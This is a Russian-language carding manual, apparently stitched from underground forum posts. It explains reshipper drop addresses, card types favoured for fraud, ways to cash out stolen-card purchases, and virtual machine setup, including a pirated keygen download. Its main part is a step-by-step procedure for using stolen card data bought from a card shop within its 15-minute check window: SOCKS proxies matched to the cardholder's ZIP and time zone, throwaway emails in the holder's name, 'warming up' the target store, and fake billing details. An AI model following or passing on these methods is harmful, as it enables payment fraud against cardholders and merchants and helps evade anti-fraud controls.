Address: Адрес. Если адрес у холдера записан в две сточки то тут его тоже пишем в 2 строчки. Как правило это длинные адреса с номером апартаментов или комнаты.
Zip Code: Почтовый индекс
City: Город
State Штат
Country: Страна
Date of Birth: дата рождения – не обязательно.

Когда отовариваем гифт, то пишем адрес посредника, который получили, в ДВЕ строчки! Это обязательно! Из примера адреса полученного у пересыла мы видим что он распознает нас из 1000 посылок, только по номеру присвоенным нам системой, а именно 32137. Поэтому во второй строчке адреса не забываем и пишем его обязательно. Иначе посылка попадет в неопознаные. Иногда шоп требует написать Вам немного другой или сокращенный адрес, не соглашаемся на это, а пишем только тот адрес, который указан.

ВАШ АДРЕС В США:
Street 1 (Улица): 3702 W Valley HWY N
Street 2 (Улица): STE 204-32137
City (Город): Auburn
State (Штат): WA или Washington
Zip Code (Индекс): 98001
Phone (Телефон): 253 7374507


Обычный шоп с оплатой кредитными картами

Работа обычного шопа с использованием оплаты по кредитным картам.

Merchant (платежная система) — юридическое лицо, принимающеё платежи по пластиковым картам.
Merchant Account — уникальный номер идентификации предприятия торговли/услуг в платежной системе, который позволяет принимать платежи по банковским картам. Регистрируя Merchant Account, банк соглашается оплачивать предприятию торговли/услуг правильно совершенные сделки (покупки) в обмен на снятие средств со счетов покупателей в банках-эмитентах.
Merchant Bank — банк, в котором открыт Merchant Account.
Merchant Category Code — код, который банк-эквайрер присваивает продавцу. Данный код, обычно состоящий из четырех цифр и называемый иногда Sic Code, отражает основное направление деятельности продавца.


Виды карт
В основном для первоначальных вбивов мы используем 3 вида карт:
ˆ American Express (карта начинается с цифры 3)
ˆ VISA (с 4)
ˆ Master Card (с 5)
Каждая из этих карт имеёт свой определенный тип.
В основном будем выбирать Кредитные карты или Дебетовы карты, в чем их отличие:
ˆ Кредитные карты обеспечивают финансовую свободу, без которой сегодня не обойтись. Дают также доступ к различным преимуществам и сервисам. Банк выдает холдеру лимит на получение кредитной суммы, которой он может расплатиться за ту или иную услугу, что для нас очень необходимо!
ˆ Дебетовые карты — инструмент доступа к банковскому счету, на котором хранятся денежные средства. С помощью дебетовой карты холдер может оплачивать товары и услуги, а также снимать наличные в банкоматах по всему миру. То есть тратятся деньги, находящиеся на банковском счете, а не кредитные.
Как видим, кредитные карты для нас болеё благоприятны!

Итак, начнём с типов карт American Express (основа, с чем придется работать):
Репутация американского гиганта финансовых операций сегодня безупречна и тщательно поддерживается на высочайшем уровне. American Express делает упор на качество услуг и сервиса и выстраивает свои отношения с клиентами, опираясь на многолетний опыт и традиции. Компания предлагает персональные и корпоративные кредитные карты. Держатели корпоративных карт Corporate Card – сотрудники крупных мировых корпораций. Персональные карты выпускаются четырех видов: Personal Card (так называемая «Зелёная»), Gold Card, Platinum Card and Centurion Card. Идёт по нарастанию приоритетов. Все они отличаются только классом, поскольку традиционные преимущества полагаются каждому клиенту AmEx.

Далее идут карты VISA:
Visa Electron — самый простой вид карт. Не имеёт выпуклых элементов, что ограничивает возможность использования этого вида карт в терминалах, основанных на снятии оттиска с карты (механическое копирование без подключения к базе данных). Как правило, установлены минимальные лимиты на операции и минимальные гарантии.
Visa Virtual Card — карта для совершения платежей через интернет. Порой «выпускается» без физической выдачи карты. Фактически, это предоставление владельцу лишь реквизитов карты (номер, CVV2, дата действия и т. п.), которые можно использовать для оплаты через Интернет. Удешевляется эмиссия карты, но снижается защищённость. Обычно являются предоплаченными в момент эмиссии и не предусматривают возможность пополнения. Могут быть анонимными, что иногда вызывает трудности при обработке в платёжных системах с обязательной верификацией имени владельца.
Visa Classic — карта со стандартным набором функций. Сюда входят платежи в большинстве торговых точек, принимающих карты, бронирование различных товаров и услуг в Интернете, страхование находящихся на счету денег и т.д.
Visa Gold — карта, которая имеёт дополнительные гарантии платёжеспособности держателя, болеё высокие платёжные и кредитные лимиты по сравнению с Classic, а также ряд дополнительных сервисов, среди которых экспресс-выдача наличных и экстренная замена карты в случае утери или кражи карты вдали от банка-эмитента, дополнительные скидки и привилегии в таких сферах, как путешествия, прокат автомобилей, покупки эксклюзивных товаров и услуг. Как правило, вместе с обязательными привилегиями от платёжной системы, банки-эмитенты карт предлагают собственные дополнительные услуги для держателей карт Gold и болеё высокого уровня.
Visa Platinum — элитная карта, которая обычно предоставляет возможность владельцу получить дополнительные услуги, скидки, страховки в объёмах, превышающих привилегии для держателей карт Gold.
Visa Signature — карточный продукт для особо состоятельных клиентов, отличительными особенностями которого являются максимальная покупательная способность, повышенные лимиты на различные группы операций по картам, эксклюзивные услуги в области отдыха, покупок и путешествий, а также консьерж-сервис и специальные возможности на личной странице в Интернете.
Visa Infinite — позиционируется как наиболеё престижная карта для клиентов с наивысшей платёжеспособностью. В ряде случаев кредитный лимит по такой карте неограничен.
Visa Black Card — имиджевый элитарный продукт. Материалом для изготовления служит не обычный пластик, а патентованный специальный углепласт. Позиционируется как символ принадлежности держателя к верхушке общества. Из-за повышенных требований, в США владельцами этой карты могут стать не болеё 1 % жителей. Владелец сможет останавливаться в VIP-салонах международных аэропортов, пользоваться услугами консьерж-сервиса, обеспечивается туристическая страховка, покрытие ущерба при автомобильной аварии, возмещение затрат при отмене поездок.
Visa Business Credit и Visa Business Debit — карты для представителей юридических лиц, предназначенные для расчётов в интересах бизнеса. Данные карты позиционируются как продукт для малого бизнеса.
Visa Business Electron Card — карты позиционируются платёжной системой как продукт для малого бизнеса в странах с развивающейся экономикой.
Visa Corporate — карты бизнес-сегмента, предназначенные для компаний среднего и крупного бизнеса.
Visa Fleet — карты бизнес-сегмента, ориентированные на компании, использующие автотранспорт в своей основной деятельности. Этот тип карт помогает компаниям отслеживать эксплуатационные расходы своего автопарка, а также получать дополнительные скидки на топливо и сервисное обслуживание.
Visa Debit — карта для каждодневных расходов. Её особенность состоит в том, что списание средств происходит с депозитного счёта клиента, как если бы он снимал со счёта наличные или выписывал чеки в оплату приобретённых товаров или услуг.
Visa Prepaid Card — карта, баланс которой пополняется при выдаче в банке, и дальнейшие операции проводятся в пределах доступного остатка средств. Разновидностью данного типа карт является подарочная карта — Gift Card. Разновидностью данного типа карт можно считать и карты моментальной выдачи Visa Instant Issue — заранеё персонализованные, но не персонифицированные (без указания имени держателя). Особенностью этого типа карт является быстрая выдача карты, как правило в течение 15—20 минут с момента обращения клиента в банк.
Visa TravelMoney — карта, предназначеная в первую очередь для безопасной перевозки денежных средств, например в ходе путешествия, являясь болеё технологичным аналогом дорожных чеков. Как правило, по данному виду карт возможны только операции снятия наличных в банкоматах, однако отдельные банки допускают и покупки по картам TravelMoney.
Visa Mini Card — карта уменьшенного формата, нередко выпускается с отверстием, подразумевая использование и в качестве брелока и не только. Необходимо отметить, что соседство с металлическими ключами крайне нежелательно и может пагубно сказаться как на записанной на магнитной полосе информации, так и привести к повышенному механическому износу карты. В силу нестандартного формата, этот тип карт невозможно использовать в банкоматах, терминалах с контактными чипами (бесконтактный протокол поддерживается — если карта снабжена таким чипом), также не получится использовать карту в импринтерах. Таким образом, данный продукт пригоден лишь для оплаты покупок или получения наличных в точках, оборудованных электронным терминалом, способным работать по магнитной полосе или бесконтактному чипу. По этой причине данный тип карт, как правило, выпускают в «связке» с картой стандартного формата, имеющей доступ к тому же картсчёту.
Visa Buxx — целевой аудиторией этой карты являются подростки, не имеющие пока самостоятельного дохода. Родители имеют возможность зачислять на карту «безналичные карманные деньги» и контролировать движения по счёту.
Visa Horizon — дебетовая карта, которая хранит средства на самом чипе, предварительно преавторизовывая их со счёта в банке. При её использовании нет необходимости устанавливать связь в режиме реального времени с банком-эмитентом для получения авторизации. Вся информация о доступном балансе находится на самой карте в памяти встроенного чипа и доступна для чтения терминалом в торговой точке. Держатель карты при необходимости может пополнить баланс на карточке со своего счёта в банке либо через банкомат, либо через один из терминалов в торговой сети или отделениях банка. Visa Horizon идеально подходит в тех случаях, когда существуют проблемы со связью или таковая вообще отсутствует. Поскольку для данного продукта отсутствует риск неплатёжеспособности или перерасхода средств за счёт предварительной авторизации, то Visa Horizon идеально подходит для выдачи клиентам, у которых отсутствуют банковская и кредитная истории. В отличие от карты с электронным кошельком, в котором баланс на карте предоплачивается и
в случае потери карты клиент теряет непотраченные средства с карты, Visa Horizon позволяет восстановить остававшиеся к моменту потери карты средства на счету клиента в банке.
Visa Cash или, как ещё её принято называть, «электронный кошелёк», является предоплаченной картой и совмещает в себе удобства платёжных карт с защищённостью и функциональностью встроенного чипа. Карта Visa Cash позволяет легко и быстро оплачивать мелкие расходы, поэтому в основном может использоваться для покупки недорогих предметов, таких, как газеты, билеты в кино, для оплаты непродолжительных телефонных переговоров и т. д. Карта Visa Cash может быть либо пополняемой, либо одноразовой. Решение об этом принимается банком-эмитентом, выдающим карту, и согласовывается с клиентом.
Visa Payroll — обычный тип карт, который сразу при приобретении предоставляет страховку личного имущества человека, приобретённого при помощи данной карты Visa. Общая сумма страховки не может превышать 50 тысяч долларов на человека. На данный момент такие карты выпускаются только в США.
Visa Check, Visa Gold Check и Visa Business Check — карты, созданные для сотрудничества с программами накопления миль у авиаперевозчиков. В основном это касается системы WorldPerks компании NWA
Visa Platinum Check — аналогична предыдущим трём картам, однако не может быть объединена с программой WorldPerks, хотя предоставляет бо́льшие возможности для обладателей, чем Visa Check или Visa Gold Check.
Visa Purchasing — карта предлагается банками с 1994 года и предназначена для учёта затрат на офисные нужды. Карта может быть использована как средними, так и крупными компаниями и выдаётся, как правило, людям, отвечающим в этих компаниях за хозяйственную деятельность. Её использование позволяет компаниям как частного, так и государственного сектора обходиться без требующего много труда и бумаг процесса оформления небольших закупок товаров и услуг. Карта непосредственно предназначена для закупки товаров и оплаты услуг на сумму в пределах 5 тысяч долларов США. Для данных карт к банкам предъявляются требования по специальной форме отчётности при выставлении счетов. Благодаря этой форме предприятие может существенно сэкономить на административных расходах, связанных с приобретением товаров, а также получить информацию, анализ которой может быть взят за основу для проведения переговоров с поставщиками товаров и услуг относительно болеё выгодных условий сотрудничества.
Visa Commercial — создаёт простую консолидацию расходных данных со всех отделов, подразделений и дочерних предприятий компании, что обеспечивает интегрированный обзор всех расходов по проведению мероприятий и закупкам, а также командировочных расходов.
Следует обратить внимание, что в некоторых странах или регионах доступны не все виды карт; это может быть связано с особенностями законодательства той или иной страны, а также региональными ограничениями самой платёжной системы.

Далее рассмотрим карты типа Master Card (основные):
MasterCard Maestro — это самые доступные банковские карты, вследствие своей низкой стоимости и первоначального взноса. Приобретая её, вы становитесь обладателем полноправной международной карты, широко применяемой в мире.
MasterCard Standard – наличие таких карточек подчеркивает, что Вы - состоявшийся человек, успешно ведущий дела. Отправляясь за границу и имея при себе одну из этих карт, у Вас не будет проблем забронировать номер в отеле или взять напрокат автомобиль.
MasterCard Gold – эти карты внушают большеё уважение к владельцу этой карты. Они однозначно говорят о том, что его авторитет и вес в обществе выше обычного, что человек достиг в своей жизни серьезных результатов. Это дает владельцу «золотых» карт право на скидки при заказе дорогих номеров в гостиницах и при совершении покупок в престижных магазинах.
MasterCard Platinum – особые банковские карты класса «Премиум». Дают безграничные возможности, полную свободу и эксклюзивность. Владельцу платиновой карты обеспечен статус VIP-персоны в любом месте, в любой точке во всем мире. Это гарантирует одновременно высококлассное обслуживание и существенные скидки.

Помимо уже имеющихся карт, клиентам предлагают обзавестись «пластиком» американской Discover (начинается с цифры 6).
Discover, наоборот, как бы «народная», причем изначально ориентированная на кредитные программы. Основная «фишка» системы – бонусы. При покупке товаров и услуг при помощи заемных средств с карты клиенту возвращается какая-то часть суммы (весьма незначительная), при этом, чем больше тратишь, тем больше процент возврата.
Картами Discover пользоваться невыгодно! Причин тут несколько. Во-первых, совершенно непонятно, где ими можно будет расплачиваться, так как не везде принимают данную платежную систему. А если и принимают, то там, вне всякого сомнения, цены будут несколько завышенными. Во-вторых, проблема с банкоматами – сунуть её можно будет только в АТМ банка-эмитента. С соответствующим уровнем комиссии. В-третьих, в Европу и Аию с этим «пластиком» тоже не поедешь – логотип с оранжевым «апельсином» в центре крайне редко можно увидеть в Старом свете. Те же, кто часто ездят в США или Канаду всегда могут расплатиться привычной Visa.
Некоторые сторонники, назвали её лучшей кредитной картой для людей, беспокоящихся о мошенничестве в Интернете и защиты личности. Некоторые виды защиты по данному типу карты, обеспечивается бесплатно:
ˆ Доступ к службе поддержки 24/7
ˆ Агент по фрауду - каждая учетная запись внимательно наблюдает необычную деятельность, а заказчик связывается с холдером для проверки изменений по карте.
ˆ Безопасные онлайн счета - владелец карточки может получить новый номер для каждого Web Merchant. Это защищает их фактический номер счета.
ˆ Кредитный отчет, программы мониторинга
ˆ Кредитные отчеты из трех основных кредитных бюро контролируются каждый рабочий день. Любая необычная активность, сообщается владельцу карты Discover. Плата за эту услугу составляет от $ 12,95 в месяц до $ 129,95 в год.
ˆ План Wallet защиты предлагает блокировку карты с одного телефонного звонка, в случае потери или кражи.
Типы карт Discover:
1. Платиновые карты
2. Газ карты
3. Miles карты
4. Студенческие карты
Основные отличия легко понять по названиям карт.
1. Все стандартные преимущества Discover Card, входящие в Platinum Card:ˆ Без платы за годовое обслуживание
ˆ Cashback бонусы
ˆ Антифрауд агент
ˆ Максимальная кредитная линия в $ 50.000
ˆ Случайная смерть при путешествии, страховая выплата $ 500.000
ˆ Страховое покрытие на аренду авто

ˆ Газ карты — награда за их использование составляет в среднем 5 процентов для топлива и на расходы по техобслуживанию. До 1 процента денежных средств, предлагаемых на другие покупки, сделанные с этой карты.
ˆ Miles карты: Покупки, сделанные с карт Miles, будут вознаграждены "милями" вместо наличных денег. Простая формула, одна миля и за неё дается доллар. Накопленные мили можно обменять на авиабилеты, круизы, рестораны, проживание в гостинице и аренда автомобилей.
ˆ Студенческие карты — предназначены для тех, кто имеёт ограниченный опыт и ресурсы. То есть обычная карта, с ограниченными возможностями!

Вот вроде как и всё! Основа, с чем придется работать.


Методы монетизации

Следующие методы приведены как базовые, на самом деле для заработка денег в сфере каржа можно придумать не одну сотню способов.

1) Продажа вещей с аккаунтом посредника. Можно продавать товар не оплачивая доставку до места вашего проживания, это существенно экономит время и средства. При продаже отдается логин и пароль от личного кабинета того или иного посредника. Человек приобретает аккаунт, указывает свой адрес доставки в личном кабинете и спокойно высылает товар.
2) Продажа E-gift. Так же можно продавать и E-gift card (гифты). При продаже необходимо указать из какого магазина гифт или какой товар можно приобрести на него, указать номинал. Гифт выглядит как случайный набор букв и цифр, который нужно будет вписать на сайте во время чекаута.
3) Продажа перекупщикам. Можно продать скупщикам, но тут все зависит от ликвидности товара, и от того, какой процент вы хотите получить от изначальной стоимости.
4) Продажа на родине. Если вы понимаете, что ваш товар ликвиден на рынке, то можно его продать самостоятельно. Оплатить доставку до вашего места жительства, получить товар. Далее можно его реализовать, выставив объявление в интернете: на Авито, форумах и т д.


VMware

Как установить операционную сиcтему на виртуальную машину VMware Workstation
VMware Workstation - программа для создания виртуальных компьютеров на Вашем ПК. VMware Workstation можно использовать для тестирования разных операционных систем и программ, сетевых соединений на одном компьютере, при этом не затрагивая безопасность работы основного ПК. В этой статье показываеться как создать виртуальную машину с Windows XP. После запуска появляется диологовое окно программы VMware Workstation:
Чтобы создать новую виртуальную машину нажмите кнопку «New Virtual Machine» или просто кнопки на клавиатуре Ctrl+N.
Выбираем диск или.iso файл (образ) с операционной системой. В моем примере будет использоваться диск с ОС Windows XP. Жмём Next.
VMware Workstation будет запрашивать ключ активации (если Вы устанавливайте Windows). После ввода ключа выбираем имя и папку, куда будет установлена операционная система.
Указываем размер жесткого диска нашей виртуальной машины и жмем Next. Рекомендуемый размер жёсткого диска для Windows XP 40 Gb, но для ознакомления 8Gb вполне достаточно.
Последняя проверка перед созданием виртуальной машины. С помощью кнопки Customize Hardware... можно изменить текущие настройки, например, увеличить количество оперативной памяти для виртуальной машины. Нажимаем Finish, начинается установка операционной системы на VMware Workstation.
Далее установка операционной системы на VMware Workstation осуществляется в обычном режиме.


Virtual Box
В первую очередь скачайте образ виртуального диска с той ОСью с которой собираетесь работать в виртуалке.
Как установить операционную ситему на виртуальную машину?
Первое, что нужно сделать, это создать раздел (виртуальное устройство). Откройте VirtualBox и нажмите на «Создать». Имя вписывайте любое понравившеёся,в разделах “Тип” и “Версия” выбирайте те, образ которых собираетесь устанавливать.
Все последующие пункты: объём памяти, тип жесткого диска, количество Гб – везде жмите «Next/Дальше». Параметры предложенные системой вполне подойдут. VirtualBox знает какие характеристики нужно подобрать, чтобы эмулировать известные ему ОС.
Настройка. Следующий шаг – настройка виртуальной ОС. Вы уже выделили место для XP на вашем компьютере.
Теперь к виртуальному устройству, нужно подключить ISO-образ Windows XP. Зайдите в «Настройки». В окне выберите пункт «Носители», возле «контроллер IDE – кликните на «Пусто», возле «Привод: Вторичный мастер» кликните по иконке диска. А там выберите пункт «Выбрать образ оптического диска».
Откроется окно поиска образа. Вы должны найти ISO-файл XP. По сути, файл ISO - это и есть установочный диск для виртуальной машины.
Когда выберите файл, не забудьте подтвердить «ОК».
Запуск. Можно считать, что вы полностью подготовили устройство и «запихнули в DVD-ROM» диск. Остается включить машину и начать установку. Жмите «Запустить».
Откроется отдельное окно виртуальной машины, где и будет происходить инсталляция. Скореё всего, по умолчанию вы выбрали 10 Гб жесткого диска, поэтому сейчас система показывает неразмеченную область 10237 Мб.
Внизу экрана вы видите команды. Нажмите «С», чтобы создать раздел.
Когда вы его создадите, жмите «Установить».
Теперь система предлагает форматировать созданный раздел. Выбирайте форматирование в формате NTFS.
Установка началась: «Программа установки копирует файлы». Когда прогресс завершится, Windows XP перезагрузится, и инсталляция продлится.
После окончания установки осталось «вытянуть с устройства диск». Закройте окно виртуальной XP и зайдите еще раз в «Настойки». Там, где вы прикрепляли ISO-образ, надо теперь его изъять. Изымайте.
ISO-файл можете удалить.
Windows XP готова к первой загрузке. Чтобы удобно взаимодействовать с виртуальной машиной, дадим несколько подсказок.
Есть два режимы мышки VirtualBox – интегрированный и неинтегрированный. Если будете использовать второй, то чтобы вернуть мышку в основную ОС, нажмите правый “Ctrl”.
Менять режимы можно во вкладке «Машина», а там «Выключить/включить интеграцию мышки».
Для работы нам понадобится перемещать файлы между основной машиной и виртуальной. Что бы делать это нам понадобится создать общие папки.
Создайте на основной машине папку из которой хотите сделать общую с виртуалкой.
Наводим курсор на значок с изображением папки,правой кнопкой мыши выбираем "настроить общие папки".
Далее кликаем на значок добавления папки, указываем путь к созданной нами папке.
После завершения процесса на виртуальной машине папка будет выглядеть в виде дополнительного диска, а на основной машине так и останется в виде обычной папки.
Если после этих действий папка не интегрировалась с виртуалкой, в окне виртуалки вверху выберите вкладку “Устройства” в ней “Подключить образ диска дополнений гостевой ОС” и всё заработает.


Установка виртуальной машины VMware Workstation и Windows 7

VMware Workstation — популярная программа для виртуализации систем. VMware Workstation является массивным решением для разработчиков программного обеспечения и системных админов, создающих и тестирующих полно-комплексные сетевые приложения класса серверов, работающие в разнообразных средах.
Итак приступим:
1) Заходите на страницу оффициального сайта для скачивания программы: http://downloads.vmware.com/d/
2) Нажимаете на ссылку VMware Workstation (находится практически в самом низу страницы)
3) На открывшейся странице выбираете для скачивания VMware Workstation X.X.X for Windows (где X.X.X - номер версии)
4) Щелкаете на кнопке Download рядом с Workstation for Windows 32-bit and 64-bit with VMware Tools.
5) Нажимаете на кнопку Register и заполняете регистрационную форму (где указываете свой e-mail, в который приходит письмо с активацией, данные можете указывать не свои) и нажимаете Continue
6) Внизу EULA соглашения нажимаете Yes и оказываетесь на странице загрузки. Программа бесплатна для полнофункционального использования 30 дней. По истечении данного срока Вам необходимо её зарегистрировать. Советую заранеё скачать генератор ключей(Keygen) к вашей версии виртульной машины, чтобы при установке вписать ключ. Либо сразу скачать VMware Workstation 10.0.2 Build 1744117 + keygen + Rus отсюда http://rsload.net/soft/10943-vmware-workstation.html
7) Скачиваете Workstation for Windows 32-bit and 64-bit Main installation file with Tools. В отличие от других виртуальных машин, программа установки VMware Workstation имеёт размер болеё 500 Мегабайт.
8) Установите программу. Перезапустите компьютер, для этого в последнем окне программы нажмите Restart Now или нажмите Restart Later и перезапустите вручную позже.
9) Запустите программу. Установите переключатель на Yes, I accept the terms in the license agreement и нажмите OK
10) В главном окне программы нажмите на значок New Vitual Machine.
11) Раз в статье описывается установка для начинающих пользователей, то не будем мудрить и выберем установку стандартного пакета VMware, которого будет достаточно для большинства требований пользователей к программе виртуализации. В будущем всегда можно будет добавить компоненты, которые не входят в стандартный пакет. Установите переключатель на Typical (recommended). Нажмите кнопку Next.
12) Установите переключатель на Installer disk image file (iso). Нажмите кнопку Browse и укажите путь к ISO-образу Windows 7. Нажмите кнопку Next.
13) Укажите свой инсталяционный код Windows 7, имя пользователя и пароль и нажмите кнопку Next.
Если Вы решили ввести эти данные позже, то после нажатия кнопки Next, нажмите на кнопку Yes.
14) Выберите имя и расположение для файла Вашей виртуальной машины. Нажмите кнопку Next.
15) Задайте размер Вашего виртуального жесткого диска в гигабайтах (20 GB вполне достаточно).
16) Нажмите кнопку Finish, для создания виртуальной машины.
17) В окне VMware Workstation Activation нажмите Enter Serial Number, чтобы ввести имеющийся у Вас серийный номер (Вот здесь нам и пригодился наш Генератор ключей)
18) После введения номера во всплывшем окне Register your version of VMware Workstation now! Нажмите кнопку Register.
19) В главном окне программы перейдите на вкладку с названием Вашей виртуальной машины (по умолчанию Windows 7) и нажмите ссылку Power on this virtual machine.
20) В отличие от других виртуальных машин установка Windows 7 начнется сама и большую часть установки VMware Workstation выполнит автоматически, Ваше участие в процессе установки Windows 7 почти не потребуется.
21) После завершения установки Windows 7 на виртуальную машину, VMware Workstation сразу запустит Вам Windows 7 внутри виртуальной машины.
22) Сразу после запуска VMware Workstation самостоятельно установит Вам дополнительные инструменты VMware Tools, а также в случае наличия у Вас подключения к Интернет самостоятельно установит все необходимые драйвера.
23) Используйте комбинацию клавиш Ctrl+G для разблокировки одновременного использования мыши как в виртуальной системе, так и в основной.
24) Чтобы выключить виртуальную машину, завершите работу в виртуальной Windows 7 как в обычной Windows. Пуск -> Завершение работы.
25) Чтобы запустить установленную Windows 7 в основном окне программы в колонке слева выберите наименование Вашей операционной системы. В открывшейся вкладке с названием Вашей виртуальной машины (по умолчанию Windows 7) нажмите ссылку Power on this virtual machine.

Подключение съемных устройств к виртуальной машине.
Подключать съемные устройства можно в меню: ВМ->съемные устройства
Устанавливая галочку напротив требуемых съемный устройств, вы подключаете их к виртуальной машине, снимая галочку – отключаете. Как видите все очень просто.
Чтобы было ещё проще, приведу пример подключения к виртуальной машине USB накопителя:
- подключите USB накопитель к компьютеру и через несколько секунд в меню «ВМ->Съёмные устройства» появится новый пункт с наименованием подключаемого USB накопителя, в моем случае это: Feiya Mass Storage Device;
- поставьте галочку в меню «ВМ->Съемные устройства -> Feiya Mass Storage Device->Connect (Disconnect from Host)» и через несколько секунд на рабочем столе вашей гостевой операционной системы ( в нашем случае это Ubuntu) откроется папка с содержимым USB накопителя;
Для отключения USB накопителя снимите установленную галочку в том же меню.
Для переключения с гостевой операционной системы на хостовую нужно нажать сочетание клавиш ctrl+alt. Для возврата к гостевой операционной системы нужно кликнуть на окно с гостевой операционной системой.
Этого вполне достаточно для начала работы с виртуальной машиной, а в дальнейшем, если Вам понравятся возможности нового инструмента, а они непременно Вам понравятся, Вы с легкостью изучите все его возможности.


Вбить за 15 минут

Поговорим о вбиве и покупке картона без чека (базы с высоким % валида).
Многие шопы/селлеры предоставляют возможность купить карту без предварительного чека (чек убивает карту).
Разберем вбив на примере картона, взятого на cvv.me.
При покупке карты у нас есть 15 минут что бы чекнуть её. В случае невалидной/метрвой карты у нас есть 15 минут что бы чекнуть её на cvv и получить обратно свои деньги.
Я опишу свой способ вбива карты менеё чем за 15 минут. Предварительную подготовку, etc.
Итак, у нас все готово: VPN, соксы куплены, система стоит. Начнем.
1. Запускаем копию системы на Virtualbox.
2. Включаем CCTools, VPN, находим чистый сокс.
3. На cvv.me ищем нужную карту под zip сокса. Выбрали - жмем добавить в корзину, но НЕ ПОКУПАЕМ.
4. Заходим на сайт aol.com, жмем sign up, вводим всю инфу, которую мы можем заполнить на данный момент. Зип, Имя и т.д. Можо в принципе зарегать почту только на имя. Какая-нибудь newyourk_имяхолдера@aol.com и т.д. Проявите фантазию.
5. Тут же открываем вкладку с подготовленным заранеё шопом, куда и будем пробовать вбивать.
6. Регистрируемся в шопе, добавляем\удалям товар из корзины, если есть онлайн саппорт - прекрасно, общаемся с ним. Полазили по сайту 5+минут, пока регистрируем почту/прогружаются страницы.
7. Решили что шоп уже достаточно разогрет - заходим в корзину и жмем чекаут.
Заполняем все что возможно. Если это прямой вбив - ФИО ставим ПОСРЕДНИКА. В этом случае почта так же должна быть зарегистрирована на ФИО ПОСРЕДНИКА.
8. Таких шопов может быть несколько. На разные суммы, если есть опасения что карта с низким балансом.
9. Покупаем карту. Теперь у нас есть 15 минут что бы вбить номер карты и cvv код в наши магазины, чего болеё чем достаточно.
Вбили - жмем pay или place order и смотрим что нам напишут.
Если пишут "payment declined" - значит косяк с картой. Может быть невалидная или с низким балансом. В этом случае пробуем бить второй шоп с другой суммой.
Так же бывает платеж не проходит и выскакивает сообщение "AVS missmatch". Просто бьем в другой шоп. Если и там деклайн - чекаем карту. Тут может быть 2 варианта. Либо карта Alive либо Decline.
В первом случае скореё всего баланс карты минимален. Потому можно пополнить скайп и потратить на прочие мелочи. А можно забить на неё и отдать народу в халяву.
10. Если желание бить не пропало - смотрим другую карту под эти же настройки системы/сокс, берём другой шоп и повторяем процедуру.
Рекомендую не бить в болеё чем 1 шоп, для увеличения КПД. На первых порах можно бить и в 2 шопа одной картой, не болеё. Дополнительные шопы в большей мере открыты на случай невалидной карты или карты с низким балансом.

Пошаговая инструкция по вбиву за 15 минут.
Большинство шопов при продаже СС, устанавливают определенное время, за которое мы может проверить купленную нами карту на валидность. Возьмем пример шопа - CVV.ME, при покупке материала на данном сайте, нам дается возможность проверить карту на работоспособность, чекнув её (выбрав один из способов CHECK) в течении 15 минут после покупки, то есть тем самым проверив её на работоспособность. Если карта рабочая, то появляется надпись «Approved», если карта дохлая, то
«Decline». Но вот сложилась такая закономерность, что чекая карту на проверку валидности, сам чекер её начинает убивать, возможно убивает даже не чекер, а сам кардхолдер, которому после Чека сразу же приходит оповещение, о списании денежных средств с его карты и он её блокирует. То есть чекая данную карту, шоп ткже может показать, что карта рабочая, то есть «Approved», но когда мы начинаем её вбивать в шоп, то шоп указывает, что карта деклайн (либо просто не хватает на ней средств). Либо шоп при чеке сразу скажет «Decline» и вернет вам, ваши средства. Так вот, чтобы избежать данной муторной ситуации и траты своих средств попусту, постараюсь разъяснить вам, как успеть вбить карту в шоп за 15 минут, после чего чекнуть её в шопе (если карта не пройдет).

Итак:
- Для начала заходим в шоп CVV.ME и начинаем подбор необходимого нам материала для вбива!
- Юзаем поиск шопа по определенным критериям, то есть выбираем несколько карт определенной категории, допустим "CREDIT Платинум", кстати "Дебет Платинум тоже неплохие", нам выходит список карт данной категории, допустим 10 карт «VisacreditPlatinum», валид 70%
- После чего просматриваем ЗИП и Штат держателей карт, и с помощью Сокс-клиента подбираем для одной из потенциальных для покупки карт, НУЖНЫЙ НОСОК. Если же данного носка не находим, то по ЗИПУ карты открываем ГУГЛМАП и просматриваем ближайшие районы (города) и если таковые имеются, выбираем один из них в СОКС-Клиенте.
- Поставив необходимый нам носок, кидаем карту в корзину.
- Выбираем часовой пояс, под выбранную нами карту, а именно под штат. Проверяем соответствие всех параметров на сайте WHOER.NET
- Далее находим через ГУГЛ необходимый нам шоп с товаром. Заходим ОБЯЗАТЕЛЬНО в ШОП ЧЕРЕЗ ГУГЛ, либо иной поисковик (так как мерч шопа видит, через что я зашел в него, и некоторые шопы спрашивают, как я на них вышел и уверенно пишу ГУГЛ)
- Передвигаемся по некоторым вкладкам шопа, выбирая тот или иной товар, дабы показать свою активность. При этом параллельно, с приблизительным именем подбираю почтовый ящик к карте, которую кинул в корзину (можно купить очень дешево ящики на buyaccs.com)
- Параллельно с этим, в ГУГЛЕ нахожу факс какого-нибудь учреждения, в выбранном нами штате под СС, чтобы указать его в БИЛЛИНГ адресе.
- Далее заходим снова в шоп, выбираем нужный товар, если необходима регистрация, то регистрируемся уже на имеющеёся мыло. Также нам выходит форма для заполнения Биллинг адреса и данных кардхолдера. После чего максимально возможно вбиваем имеющуюся информацию о кардхолдере в БИЛЛИНГ адрес.
- Затем снова возвращаемся в корзину шопа на CVV.ME и покупаем, уже лежащую в ней карту.
- Далее идем в ШОП, с имеющимся в корзине товаром, и ДОВБИВАЕМ остатки информации с карты в форму заполнения. Как правило, там остается довбить фамилию кардхолдера, номер карты, дату и ЦВВ код.
- После чего нажимаем на кнопку ЧЕКАУТ и ожидаем решения.
- Подождав несколько секунд, шоп нам указывает, что карта либо ДЕКЛАЙН, либо ПОЛУЧАЕМ НОМЕР ОРДЕРА. Если карта Деклайн, то быстро возвращаемся на CVV.ME и чекаем купленную карту. Чекнув карту, мы получаем свои средства обратно. Ежели при чеке показывает «Approved», то либо на карте не имеётся достаточно средств для покупки выбранного вами товара, либо имеются иные причины отказа.

На все заполнение у нас выходит около 3-5 минут, то есть легко укладываемся в 15-ти минутное ограничение! Таким образом можно неплохо сэкономить свои средства + САППОРТ шопа CVV.ME в помощь, если при чеке карты выходит ошибка "Чек Файлед", то также средства без проблем возвращаются на ВАШ счет) Спасибо за внимание! ПОСТ НА УСМОТРЕНИЕ АГ ФОРУМА.


Методичка от Fuergrissa

1. Настройка системы. Ставим:
1.1. Убунту - для работы самая удобная система, имхо.
1.2. Виртуалбокс.
1.3. Устанавливаем Win7 eng на виртуалбокс, все стандартно.
1.4. CCleaner - делаем "эталонную" систему, которую будем впоследствии копировать. Клинер нужен для того что бы поетерть хистори, кукизы и прочий хлам.
